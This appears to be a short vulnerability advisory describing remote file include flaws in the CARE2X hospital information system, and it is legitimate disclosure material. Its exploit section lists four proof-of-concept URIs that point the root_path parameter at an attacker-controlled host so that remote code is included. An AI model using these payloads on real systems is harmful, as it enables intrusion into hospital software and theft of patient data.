• info
• discussion
• exploit
• solution
• references

CARE2X Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://example.com/care2x/include/inc_checkdate_lang.php?root_path=attacker site
http://example.com/care2x/include/inc_news_save.php?root_path=attacker site
http://example.com/care2x/main/diagnostics-report-index.php?root_path=attacker site
http://example.com/care2x/main/config_options_mascot.php?root_path=attacker site